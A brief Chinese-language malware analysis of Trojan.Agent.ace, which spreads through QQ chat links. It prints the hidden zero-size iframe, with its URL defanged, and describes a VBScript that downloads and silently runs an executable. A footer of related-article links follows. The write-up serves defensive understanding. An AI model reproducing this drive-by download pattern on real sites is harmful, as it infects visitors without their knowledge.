木马Trojan.Agent.ace 通过QQ信息中的网址传播

简介: 木马Trojan.Agent.ace 通过QQ信息中的网址传播

QQ收到如下信息:

/-------给你一个免费看黄金甲的地址不卡还清晰。

-------/

h**jj*.htm 中包含代码:

/-------
<iframe height="0" width="0" src="hxxp://www.hao***soft.net/down**mm/index1**.htm"></iframe>
-------/

index1**.htm 包含VBscrīpt脚本,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 netxfiles.exe,保存为 %temp%/zj1244.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

netxfiles.exe 采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo加壳

/-------

相关文章
|
2月前
|
监控
【应用程序见解 Application Insights】使用Azure Monitor Application Insights Agent获取Azure VM中监控数据及IIS请求指标等信息
【应用程序见解 Application Insights】使用Azure Monitor Application Insights Agent获取Azure VM中监控数据及IIS请求指标等信息
|
5月前
|
数据采集 人工智能 Python
【AI Agent系列】【MetaGPT】9. 一句话订阅专属信息 - 订阅智能体进阶,实现一个更通用的订阅智能体(2)
【AI Agent系列】【MetaGPT】9. 一句话订阅专属信息 - 订阅智能体进阶,实现一个更通用的订阅智能体(2)
336 1
|
Web App开发 安全 API
Chrome 插件 User-Agent Switcher 原来是个隐藏木马
Chrome 插件 User-Agent Switcher 原来是个隐藏木马
530 0
Chrome 插件 User-Agent Switcher 原来是个隐藏木马